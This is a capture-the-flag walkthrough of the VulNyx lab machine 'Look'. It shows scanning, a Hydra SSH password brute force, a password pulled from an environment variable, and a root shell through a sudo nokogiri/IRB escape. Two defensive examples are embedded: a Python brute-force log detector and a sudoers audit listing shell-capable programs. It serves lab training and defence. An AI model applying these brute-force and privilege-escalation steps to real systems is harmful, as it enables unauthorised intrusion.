🔵 NYX - Look

#vulnyx #nyx #linux #ssh (bruteforce) env #nokogiri (sudo)

June 26, 2023 by Miguel R. (d4t4s3c)

Information

Look is a Linux machine on the VulNyx platform; it has a low difficulty level and was created by the user d4t4s3c.

  • Initial access: I enumerate a user through an exposed phpinfo, brute-force SSH and gain access to the system.
  • Privilege escalation: The user has sudo permissions on a binary that allows escaping to a shell as root.


Enumeration

Nmap

TCP
 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 11:45 CET
Nmap scan report for 192.168.1.85
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
 nmap -sVC -p22,80 192.168.1.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 12:08 CET
Nmap scan report for 192.168.1.85
Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)

Shell (axel)

80/TCP (HTTP)

Directory Brute Force
 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.85/ -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.85/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/info.php             (Status: 200) [Size: 69374]
/look.php             (Status: 200) [Size: 76]
Progress: 882184 / 882188 (100.00%)
===============================================================
Finished
===============================================================

I enumerate the user axel in the info.php file

22/TCP (SSH)

Password Brute Force

Having a valid username, I try to obtain its password with Hydra

 hydra -t 64 -l axel -P /opt/techyou.txt ssh://192.168.1.85 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 12:24:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking ssh://192.168.1.85:22/
[STATUS] 624.00 tries/min, 624 tries in 00:01h, 9416 to do in 00:16h, 24 active
[22][ssh] host: 192.168.1.85   login: axel   password: bambam
[STATUS] attack finished for 192.168.1.85 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

I obtain the password bambam for the user axel and log into the system with the obtained credentials

 ssh axel@192.168.1.85
axel@192.168.1.85's password: 
axel@look:~$ id ; hostname
uid=1000(axel) gid=1000(axel) grupos=1000(axel)
look
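A run like the Hydra one above leaves a very recognisable trace in sshd's auth log: a burst of failed logins for one account from one client, followed by a success for the same pair. The following detector is an added example (not part of the original writeup) that runs over constructed auth.log lines and flags exactly that pattern; the sample lines, the failure threshold and the window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not captured from the machine), shaped like
# what an SSH password-guessing run leaves behind: a burst of failures for one
# account from one client, then a success for the same client/account pair.
SAMPLE_LOG = """\
Feb 16 12:24:57 look sshd[2101]: Failed password for axel from 192.168.1.10 port 51001 ssh2
Feb 16 12:24:57 look sshd[2102]: Failed password for axel from 192.168.1.10 port 51002 ssh2
Feb 16 12:24:58 look sshd[2103]: Failed password for axel from 192.168.1.10 port 51003 ssh2
Feb 16 12:24:58 look sshd[2104]: Failed password for invalid user admin from 192.168.1.10 port 51004 ssh2
Feb 16 12:24:59 look sshd[2105]: Failed password for axel from 192.168.1.10 port 51005 ssh2
Feb 16 12:25:40 look sshd[2150]: Accepted password for axel from 192.168.1.10 port 51066 ssh2
Feb 16 12:30:00 look sshd[2200]: Accepted publickey for axel from 192.168.1.20 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(line, year=2025):
    # Syslog timestamps carry no year, so one is supplied (assumed 2025 here).
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def find_bruteforce(log_text, threshold=4, window_s=60):
    """Return {(ip, user): (failures, success_seen)} for pairs with at least
    `threshold` failures inside `window_s` seconds; success_seen marks a later
    'Accepted' for the same pair, i.e. the guessed password worked."""
    fails = defaultdict(list)
    hits = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        key = (ip, user)
        if result == "Failed":
            # Keep only failures still inside the sliding window, then add this one.
            fails[key] = [t for t in fails[key] if (ts - t).total_seconds() <= window_s]
            fails[key].append(ts)
            if len(fails[key]) >= threshold:
                hits[key] = (len(fails[key]), False)
        elif key in hits:
            hits[key] = (hits[key][0], True)
    return hits
```

A pair reported with success_seen set to True is a guessed credential, not just noise, and is the signal to rotate that account's password and review its sessions.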

Shell (dylan)

With env I find a password for the user dylan in an environment variable

axel@look:~$ env
SHELL=/bin/bash
PWD=/home/axel
LOGNAME=axel
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/axel
LANG=es_ES.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.1.10 51066 192.168.1.85 22
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=axel
SHLVL=1
XDG_SESSION_ID=6
XDG_RUNTIME_DIR=/run/user/1000
SSH_CLIENT=192.168.1.10 51066 22
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dylanPASS=bl4bl4Dyl4N
SSH_TTY=/dev/pts/0
_=/usr/bin/env

axel@look:~$ echo $dylanPASS
bl4bl4Dyl4N

I switch to the user dylan with the obtained credentials

axel@look:~$ su - dylan
Contraseña: 
dylan@look:~$ id ; hostname
uid=1001(dylan) gid=1001(dylan) grupos=1001(dylan)
look

Privilege Escalation

The user dylan has sudo permissions on the nokogiri binary

dylan@look:~$ sudo -l
Matching Defaults entries for dylan on look:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dylan may run the following commands on look:
    (root) NOPASSWD: /usr/bin/nokogiri

In the nokogiri man page I see that it uses IRB, which usually has functions such as exec to run commands

I check IRB on GTFOBins and get a shell as root

dylan@look:~$ sudo -u root /usr/bin/nokogiri /etc/passwd
Your document is stored in @doc...
irb(main):001:0> exec '/bin/bash -i'
root@look:/home/dylan# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
look
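Both weaknesses used on this box (a credential exported into the environment, and a NOPASSWD sudo rule on a program that drops into a REPL) are cheap to catch in a host audit. The script below is an added example, not part of the original writeup, with constructed sudoers and profile content; the list of shell-capable programs is an illustrative subset in the spirit of GTFOBins, and the placeholder password value is an assumption.

```python
import re
from os.path import basename
# Programs that hand the caller a shell or REPL when run under sudo (an
# illustrative subset in the spirit of GTFOBins; nokogiri drops into IRB).
SHELL_CAPABLE = {"nokogiri", "irb", "ruby", "python3", "perl", "vim", "less", "bash"}
# Constructed sudoers content (an assumption, not the machine's real file).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
dylan ALL=(root) NOPASSWD: /usr/bin/nokogiri
alice ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""
SUDO_RULE = re.compile(
    r"^(?P<who>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return (user, runas, program) for NOPASSWD rules on shell-capable programs."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD" not in m["tags"]:
            continue
        for cmd in m["cmds"].split(","):   # a rule may list several commands
            prog = basename(cmd.split()[0])
            if prog in SHELL_CAPABLE:
                findings.append((m["who"], m["runas"], prog))
    return findings

# Constructed profile snippet with a credential pushed into the environment
# (the value is a placeholder, not the real one).
SAMPLE_PROFILE = """\
export PATH=/usr/local/bin:/usr/bin:/bin
export dylanPASS=placeholder-value
EDITOR=vim
"""
ASSIGN_RE = re.compile(r"^\s*(?:export\s+)?(?P<name>[A-Za-z_]\w*)=")
SECRET_NAME = re.compile(r"pass|pwd|secret|token", re.I)

def find_env_secrets(text):
    """Return names of credential-looking variables assigned in a profile file."""
    names = []
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m and SECRET_NAME.search(m["name"]):
            names.append(m["name"])   # value deliberately not echoed back
    return names
```

On a real host, feed it the contents of /etc/sudoers, /etc/sudoers.d/*, /etc/environment, /etc/profile.d/* and the users' shell rc files.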

Flags

Now as the root user I can read the user.txt and root.txt flags

root@look:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
5e1a6***************************
084eb***************************

That concludes the walkthrough of the Look machine.

Happy Hacking!


© d4t4s3c 2023-2025
